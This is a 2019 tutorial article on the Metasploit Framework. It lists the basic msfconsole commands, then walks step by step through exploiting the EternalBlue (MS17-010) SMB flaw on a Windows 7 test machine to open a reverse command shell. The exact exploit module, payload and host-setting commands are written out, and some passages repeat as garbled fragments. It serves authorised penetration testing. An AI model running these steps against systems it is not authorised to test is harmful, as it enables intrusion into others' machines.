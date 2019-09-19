Many years ago, I introduced the benefits of using the Metasploit Framework for security vulnerability and penetration...

testing. Then in its infancy, Metasploit has grown to be an extremely popular and valuable tool that no security professional should be without. Traditional vulnerability scanners often leave you wanting more in terms of actual evidence and that's where Metasploit shines. The tool allows you to go the extra mile and demonstrate how certain vulnerabilities can be exploited and thus how they impact your network environment.

Metasploit has exploit code for a wide range of vulnerabilities in standalone software, web servers, OSes and more -- 1,843 exploits and 541 payloads in its current 5.0 version, to be exact. Even with this massive number of exploits and payloads to choose from, it isn't enough to exploit every possible vulnerability and penetration testing scenario you come across. But then again, the framework was designed so you can write your own or use someone else's exploit code, if you're so inclined.

Let's look at how to use Metasploit's built-in exploits and payloads in a real-world testing scenario. Be forewarned that it's possible to create undesired results with Metasploit when performing tests, such as crashes or production systems left in an unstable state. As with any security testing venture, proceed with caution and have a contingency plan in the event something goes awry.

History of Metasploit Since 2003, Metasploit has been a favorite tool among IT and security professionals looking to "exploit" vulnerabilities they uncover. Originally written in Perl, Metasploit was rewritten in Ruby a few years later and is now the go-to platform for vulnerability exploitation and development. Originally a free tool, two versions exist today: Metasploit Framework and Metasploit Pro. The Framework edition is free; the Pro edition is a commercial product intended for businesses with a bigger security budget for a GUI-based product that can automate various testing tasks, test for web vulnerabilities and offer API integration.

Need-to-know Metasploit commands Below is an example of a Metasploit test using the free Metasploit Framework. I will be testing for WannaCry, a worm that exploited a vulnerability in the Microsoft Server Message Block protocol known as EternalBlue. Before jumping into the specific steps to execute this exploit, there are some common Metasploit console commands you should know about. The Metasploit console is referred to as msfconsole, which also happens to be the name of the batch file that starts up the program. Commands you should be familiar with include: help (or '?' without the quotes) shows the available commands in msfconsole;

shows the available commands in msfconsole; show exploits shows the exploits you can run -- in our example, the windows/smb/ms17_010_eternalblue exploit;

shows the exploits you can run -- in our example, the exploit; show payloads shows the various payload options you can execute on the exploited system such as spawn a command shell, uploading programs to run, etc. -- in our example, the shell_reverse_tcp exploit;

shows the various payload options you can execute on the exploited system such as spawn a command shell, uploading programs to run, etc. -- in our example, the exploit; use [exploit name] instructs msfconsole to enter into a specific exploit's environment -- for example, use windows/smb/ms17_010_eternalblue will bring up the command prompt msf5 exploit(windows/smb/ms17_010_eternalblue) > ;

instructs msfconsole to enter into a specific exploit's environment -- for example, will bring up the command prompt ; info shows a description of the specific exploit you're using along with its various options and requirements;

shows a description of the specific exploit you're using along with its various options and requirements; show options shows the various parameters for the specific exploit you're working with;

shows the various parameters for the specific exploit you're working with; show payloads shows the payloads compatible with the specific exploit you're working with;

shows the payloads compatible with the specific exploit you're working with; set PAYLOAD allows you to set the specific payload for your exploit -- in our example, set PAYLOAD generic/shell_reverse_tcp ;

allows you to set the specific payload for your exploit -- in our example, ; show targets shows the available target OSes and applications that can be exploited;

shows the available target OSes and applications that can be exploited; set TARGET allows you to select a specific target OS or application when allowed by certain exploits;

allows you to select a specific target OS or application when allowed by certain exploits; set RHOST allows you to set your target host's IP address -- in this example, set RHOST 10.1.1.208 ;

allows you to set your target host's IP address -- in this example, set ; set LHOST allows you to set the local host's IP address for the reverse communications needed to open the reverse command shell -- in this example, set LHOST 10.1.1.214 ;

allows you to set the local host's IP address for the reverse communications needed to open the reverse command shell -- in this example, set ; back allows you to exit the current exploit environment you've loaded and go back to the main msfconsole prompt; and

allows you to exit the current exploit environment you've loaded and go back to the main msfconsole prompt; and exit allows you to exit the Metasploit console. Another important command worth noting is msfupdate. Msfupdate is not a command that you run within the console, but an external program built into the Metasploit Framework. Msfupdate is a batch file located in the Metasploit Framework \bin folder that will download and update your running instance of Metasploit to the latest version.

How to use Metasploit: Real-world exploit Now that I've described the basic commands, let's take a look at some specific steps required to carry out a real-world exploit. My testing system is a Windows 10 workstation running the latest Metasploit Framework. My test target in this example is a Windows 7 Professional workstation that has the MS17-010 SMB vulnerability that facilitates the EternalBlue and WannaCry ransomware exploit. I chose to demonstrate the exploitation of this vulnerability because it's still very common on nearly every internal network environment I test. It's also simple to exploit and has some pretty dire consequences. I know my target system has this vulnerability because I discovered it using the Nessus vulnerability scanner. There are plenty of other vulnerability scanners, such as Nexpose and QualysGuard, that can uncover this and similar vulnerabilities as well. This approach to finding and then exploiting vulnerabilities is the standard vulnerability and penetration testing methodology, but it's not required. You can blindly test your systems or, even better, Metasploit can do some of the legwork for you as certain exploits have detection checks to see if a system is vulnerable before exploiting it. For example, in the context of our sample exploit, there's a Metasploit module called MS17-010 SMB RCE Detection that can be launched inside the Metasploit console and can determine whether or not a system has been patched against this vulnerability.

Step 1: Start Metasploit I load msfconsole.bat via the default installation folder of C:\metasploit-framework\bin and its command prompt comes up. Note: At this point you can enter show exploits to see which exploits are available to run.

Step 2: Load an exploit to run I enter use windows/smb/ms17_010_eternalblue to run the specific exploit I know the system is vulnerable to, and it loads up that specific exploit's environment prompt (hence the windows/smb/ms17_010_eternalblue> prompt).

Step 3: Show supported payloads I then enter show payloads to determine which payloads can be sent via this exploit.

Step 4: Set the payload option I decide to keep things simple and have the exploit open up a reverse command shell, so I enter set PAYLOAD generic/shell_reverse_tcp. If you wish to use the meterpreter functionality built into Metasploit, you could use a similar payload of windows/meterpreter/reverse_tcp. For this exploit, all the Windows targets are the same -- Windows 7 and Server 2008 R2. Other exploits have different target options; you can set that value using the set TARGET command from above.

Step 5: Show exploit options I then enter show options to determine the nonoptional exploit and payload parameters that don't have defaults and therefore must be set.

Step 6: Set the required options I'll enter the RHOST and LHOST parameters via set RHOST 10.1.1.243 and set LHOST 10.1.1.215 and then enter show options one final time to make sure everything is set correctly.

Step 7: Run the exploit Finally, I enter exploit to run the exploit and send the payload to my target system -- and voila -- the connection is established and I have a command prompt on the remote system. Vulnerability and penetration testing at its finest. You can imagine what could happen at this point if a malicious hacker compromised one of your systems in this way. That's why it's so important to hack your own systems to find and plug the holes before bad guys exploit them.